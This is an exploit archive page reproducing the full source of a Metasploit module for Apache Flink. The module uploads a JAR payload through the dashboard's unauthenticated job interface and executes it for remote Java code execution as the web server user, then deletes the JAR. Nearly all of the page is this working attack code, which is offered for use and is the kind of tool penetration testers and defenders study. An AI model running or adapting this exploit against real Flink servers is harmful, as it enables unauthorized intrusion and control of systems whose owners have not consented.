what you don't know can hurt you

Apache Flink JAR Upload Java Code Execution

Apache Flink JAR Upload Java Code Execution
Posted Feb 23, 2021
Authored by Brendan Coles, bigger.wing, Henry Chen | Site metasploit.com

This Metasploit module uses job functionality in the Apache Flink dashboard web interface to upload and execute a JAR file, leading to remote execution of arbitrary Java code as the web server user. This module has been tested successfully on Apache Flink versions: 1.9.3 on Ubuntu 18.04.4; 1.11.2 on Ubuntu 18.04.4; 1.9.3 on Windows 10; and 1.11.2 on Windows 10.

tags | exploit, java, remote, web, arbitrary
systems | linux, windows, ubuntu
MD5 | df5b84ceecc3ad0a0dd97aadca7fdd1a

Apache Flink JAR Upload Java Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Flink JAR Upload Java Code Execution',
'Description' => %q{
This module uses job functionality in Apache Flink dashboard web
interface to upload and execute a JAR file, leading to remote
execution of arbitrary Java code as the web server user.

This module has been tested successfully on Apache Flink versions:
1.9.3 on Ubuntu 18.04.4;
1.11.2 on Ubuntu 18.04.4;
1.9.3 on Windows 10; and
1.11.2 on Windows 10.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Henry Chen', # Initial technique demonstration and writeup
'bigger.wing', # Python exploit
'bcoles' # Metasploit module
],
'References' =>
[
['EDB', '48978'],
['PACKETSTORM', '159779'],
['URL', 'https://github.com/biggerwing/apache-flink-unauthorized-upload-rce-'],
['URL', 'https://s.tencent.com/research/bsafe/841.html'],
['URL', 'https://cloud.tencent.com/developer/article/1540439'],
['URL', 'https://nsfocusglobal.com/advisory-apache-flink-remote-code-execution-vulnerability/'],
],
'Platform' => 'java',
'Arch' => [ARCH_JAVA],
'Targets' =>
[
['Automatic', {}]
],
'Privileged' => false,
'DisclosureDate' => '2019-11-13',
'DefaultTarget' => 0,
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION]
}
)
)

register_options([
Opt::RPORT(8081)
])
end

def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'config')
})

unless res
return CheckCode::Unknown('No reply.')
end

unless res.body.include?('flink')
return CheckCode::Safe('Target is not Apache Flink.')
end

version = res.get_json_document['flink-version']
if version
return CheckCode::Appears("Apache Flink version #{version}.")
end

CheckCode::Appears
end

def delete_jar(filename)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'jars', filename),
'method' => 'DELETE',
'ctype' => 'application/json;charset=UTF-8'
)
end

def list_jars
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'jars'),
'method' => 'GET'
)
end

def upload_jar(filename, data)
post_data = Rex::MIME::Message.new
post_data.add_part(data, 'application/x-java-archive', 'binary', "form-data; name=\"jarfile\"; filename=\"#{filename}\"")
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'jars', 'upload'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s
)
end

def run_jar(filename, entry_class)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'jars', filename, 'run'),
'method' => 'POST',
'ctype' => 'application/json;charset=UTF-8',
'vars_get' => {
'entry-class' => entry_class
},
'data' => {
entryClass: entry_class,
parallelism: nil,
programArgs: nil,
savepointPath: nil,
allowNonRestoredState: nil
}.to_json
)
end

def cleanup
return unless @jar

print_status("Removing JAR file '#{@jar}' ...")

res = delete_jar(@jar)

unless res && res.code == 200
print_warning("Cleanup failed. Could not remove JAR file '#{@jar}'")
end
end

def exploit
data = generate_payload.encoded_jar.pack
fail_with(Failure::Unknown, 'Failed to generate the JAR payload.') unless data

filename = "#{rand_text_alpha(8..12)}.jar"

print_status("Uploading JAR payload '#{filename}' (#{data.length} bytes) ...")

res = upload_jar(filename, data)

unless res
fail_with(Failure::Unreachable, 'JAR upload failed. No reply.')
end

unless res.code == 200
fail_with(Failure::UnexpectedReply, "JAR upload failed. Unexpected reply (HTTP #{res.code}).")
end

unless res.get_json_document['status'] == 'success'
fail_with(Failure::UnexpectedReply, 'JAR upload failed. Unexpected reply.')
end

print_status('Retrieving list of avialable JAR files ...')

res = list_jars

unless res
fail_with(Failure::Unreachable, 'Could not list available JARs. No reply.')
end

unless res.code == 200
fail_with(Failure::UnexpectedReply, "Could not list available JARs. Unexpected reply (HTTP #{res.code}).")
end

jars = res.get_json_document['files']

if jars.blank?
fail_with(Failure::UnexpectedReply, 'Could not list available JARs. No JAR files available.')
end

jars.each do |jar|
if jar['name'] == filename
@jar = jar['id']
break
end
end

unless @jar
fail_with(Failure::UnexpectedReply, 'Could not retrieve JAR file name.')
end

print_good("Found uploaded JAR file '#{@jar}'")

entry_class = 'metasploit.Payload'
print_status("Executing JAR payload '#{@jar}' entry class '#{entry_class}' ...")

run_jar(@jar, entry_class)
end
end
Login or Register to add favorites

File Archive:

February 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    33 Files
  • 2
    Feb 2nd
    30 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    8 Files
  • 5
    Feb 5th
    11 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    1 Files
  • 8
    Feb 8th
    37 Files
  • 9
    Feb 9th
    15 Files
  • 10
    Feb 10th
    11 Files
  • 11
    Feb 11th
    26 Files
  • 12
    Feb 12th
    8 Files
  • 13
    Feb 13th
    1 Files
  • 14
    Feb 14th
    1 Files
  • 15
    Feb 15th
    9 Files
  • 16
    Feb 16th
    33 Files
  • 17
    Feb 17th
    6 Files
  • 18
    Feb 18th
    10 Files
  • 19
    Feb 19th
    20 Files
  • 20
    Feb 20th
    1 Files
  • 21
    Feb 21st
    1 Files
  • 22
    Feb 22nd
    17 Files
  • 23
    Feb 23rd
    15 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    28 Files
  • 26
    Feb 26th
    25 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close